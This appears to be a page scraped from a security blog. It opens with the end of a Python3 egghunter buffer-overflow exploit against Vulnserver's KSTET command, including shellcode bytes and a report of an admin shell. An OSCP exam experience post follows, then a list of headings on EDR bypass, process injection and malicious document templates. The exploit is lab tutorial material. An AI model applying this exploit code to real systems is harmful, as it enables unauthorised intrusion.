"\xe0\xad\xdd\xf1\x1f\x4e\x1e\xd8\xdb\x1a\x4e\x72\xcd\x22\x05"
"\x82\xf2\xf6\x8a\xd2\x5c\xa9\x6a\x82\x1c\x19\x03\xc8\x92\x46"
"\x33\xf3\x78\xef\xde\x0e\xeb\xd0\xb7\x28\x63\xb8\xc5\x48\x72"
"\x82\x43\xae\x1e\xe4\x05\x79\xb7\x9d\x0f\xf1\x26\x61\x9a\x7c"
"\x68\xe9\x29\x81\x27\x1a\x47\x91\xd0\xea\x12\xcb\x77\xf4\x88"
"\x63\x1b\x67\x57\x73\x52\x94\xc0\x24\x33\x6a\x19\xa0\xa9\xd5"
"\xb3\xd6\x33\x83\xfc\x52\xe8\x70\x02\x5b\x7d\xcc\x20\x4b\xbb"
"\xcd\x6c\x3f\x13\x98\x3a\xe9\xd5\x72\x8d\x43\x8c\x29\x47\x03"
"\x49\x02\x58\x55\x56\x4f\x2e\xb9\xe7\x26\x77\xc6\xc8\xae\x7f"
"\xbf\x34\x4f\x7f\x6a\xfd\x7f\xca\x36\x54\xe8\x93\xa3\xe4\x75"
"\x24\x1e\x2a\x80\xa7\xaa\xd3\x77\xb7\xdf\xd6\x3c\x7f\x0c\xab"
"\x2d\xea\x32\x18\x4d\x3f")

for i in range(0,len(parameters)):
    s.send(parameters[i] + b" " + b"lokiloki" + shellcode + b"\r\n")
    print(s.recv(1024))
    time.sleep(1)
s.close()

# STAGE 2: Send the Egghunter Code in the Overflow
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((IP,PORT))

egghunter = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += b"\xef\xb8\x6c\x6f\x6b\x69\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"


buf = b"\x90"*30
buf += egghunter
buf += b"\x90" * ((EIP_OFFSET-len(egghunter)-30))
buf += JMP_ESP
buf += b"\xEB\xCE"          # Jump Back 50 Bytes for egghunter shellcode
buf += b"C" * 200
s.send(b"KSTET " + buf + b"\r\n")
print(s.recv(1024))

s.close()

And, we’re Admin!

Admin Shell

[hr]

Thoughts on Python3:

I decided to use Python3 for this tutorial because I use it for just about everything. That is, with the exception of exploit development. Python 2.7 is my goto for Buffer Overflow development and honestly, I think I am going to keep that the same. The subtle buy annoying nuances of making sure everything was typecast to a bytes object sucked. Many times the objects would be sent oddly and not trigger the right response I was looking for. Python 2.7 allows strings in the s.send() method which, makes things much easier to deal with.

Anyhow, Python3 is still amazing and I will use it as my daily driver, with the exception of BOF exploit development!

Happy Thanksgiving!

Vulnserver KSTET Egg Hunter with Python3
Joshua

OSCP: Passing

Sevro Security

Joshua

28 October 2018 at 01:28

Sevro Security
OSCP: Passing

I’m humbled to finally be able to say that I am an OSCP! I was able to get 80/100 points on my second exam attempt last Friday and received the pass email on the following Monday.

I wanted to take some time and post about my experience and the way I personally managed the exam itself. There are already a significant amount of blog posts from extremely talented individuals talking about their methods to their success and although I will touch on that, I really wanted to focus on exam management. Essentially, how I set up my pre-exam workspace in order to make my flow and reporting easier. This was critical to passing the second time around. Having a single one-stop place to view the systems, their enumeration, and their exploits were incredibly helpful in pivoting and exam reporting.

[hr]

OSCP PWK Course and Exam Review:

Incredible. Purely incredible! Over the last year and a half, I have been teaching myself this skillset but, there’s a point you reach where a more formal approach to building this skillset is needed. Well, at least I needed that. OSCP gave me that and then some. Long story short, if you are looking for something extremely challenging that is practical, no bullshit, with a straight up prove yourself then this is the path you want to go down. Let’s talk about the Exam process a bit more during my second attempt:

[hr_invisible]

Before the Exam:

My first Exam attempt was a 10:00 and I burned myself too fast. My second attempt I started my exam at 16:00. This was way better than an early morning start, for me at least. But, a few hours before my second exam I set up everything ahead of time and I suggest everyone do the same.

Start your Kali box and verify network connectivity and disk space on the VM.
Create a full snapshot of the VM a few hours before the exam.
Create the directory you will be working from for the whole exam:
- /opt/OSCP/EXAM_2 –> this was mine
Start necessary services you may need and verify logins/auth works:
- FTP, TFTP, SSH, etc.
Open Firefox, Burpsuite, Terminal w/ TMUX, and Sparta.
Open up CherryTree and generate your Box Flow, I did it on a per-node basis like so:
- (25) <IP_ADDR>
- (25) <IP_ADDR>
- (20) <IP_ADDR>
- (20) <IP_ADDR>
- (10) <IP_ADDR>
In Terminal, have a TMUX window for NMAP Scans and generate your NMAP syntax in different frames on the same window.

This is how I organized the whole exam from start to finish. Anytime I compromised a host, I changed the color of the host from black to green in Cherrytree, saved my screenshots for everything, and made sure I have the proofs.txt/local.txt and continued on.

[hr_invisible]

The Exam:

When 16:00 rolled around, I had my headphones on and started working directly on a 25 point box and within 30 min, I had compromised one (1) 25 pointer. A few hours later I had knocked out the 10 pointer and a 20 pointer for a total of 55 points. I had three (3) boxes compromised and decided to take 15 min and get some food. When I came back I started working on the second 25 point host and by 23:00 local, I had it buttoned up for a total of 80 points. I backed up all my progress, made sure I had ample proof and screenshots and went to bed. I got up around 08:00 and told myself I would work on the last host (20 points) until 12:00 and if I didn’t get it, I would start on my report. I did this because I had to fly out early on Sunday morning for some work stuff and would not have time to compile the report on Sunday. Well, I could not figure out the last box so I started on the report and worked on it from 12:00 on Saturday afternoon to 01:00 on Sunday morning. Monday afternoon, I got word from Offensive Security that I had passed and holy shit I am still PUMPED about it!

Final Thoughts:

OSCP was an amazing experience that the folks at Offensive Security put a shit ton of effort into (maybe passion is the more accurate term). There’s nothing else like it out there! Without a doubt, I could not recommend the course and certification path more. If you’re still reading this and have not jumped into the PWK course let me just say this, there will never be a “good” time to start and you are not going to be 100% ready. We all work, a lot of us have kids and families, but this is worth the work!

[hr]

OSCE, here I come.

OSCP: Passing
Joshua

Reading view

Overview

Protecting Our Malware

Shellcode Encryption

Direct x86 Syscalls

Preventing 3rd Party DLLs from Injecting into your Malware

PPID Spoofing

Overwrite Shellcode

Alaris Build & Execution

Building

Execution

EDR Bypass and Detection Analysis

Sysmon Events

Bypassing Defender

Virus Total

Detection

Alaris

Tactics

Conclusion

Reference Material

Process Injection Primer

VirtualAllocEx() → WriteProcessMemory()

SuspendThread()

QueueUserAPC() → ResumeThread()

High Level API

API Call Analysis

Sysmon Analysis

Medium Level API

API Call Analysis

Sysmon Analysis

Low Level API

API Call Analysis

Sysmon Analysis

Real World Scenario

Conclusion

QueueUserAPC() Vs. CreateRemoteThread()

Reference Material

Process Injection Primer

VirtualAllocEx()

WriteProcessMemory()

CreateRemoteThread()

High Level Windows API

API Call Analysis

Sysmon Analysis

Sysmon’s Power

Medium Level API – Ntdll.dll

API Call Analysis

Sysmon Analysis

Low Level API – Direct Syscalls

API Call Analysis

Sysmon Analysis

Conclusion

Red Team

Blue Team

How Onion Hunter Works

The Database

User Configuration

Improvements

Prerequisites:

Resources:

The Crash

Buffer Overflow Standard Steps

Determine Offset:

Find JMP ESP:

Verify we have EIP Control:

A Short Jump

WS2_32.recv() Review

Analyze a Legitimate recv():

Custom Shellcode

Exploitation

Template Injection

Create the Dotm Document

Create the Docx Document

Dynamic Macro Enabling/Disabling

Disable Docx Macro:

Enable Docx Macro:

Use Case

Similar Blog Posts

Current State

Exploit Information: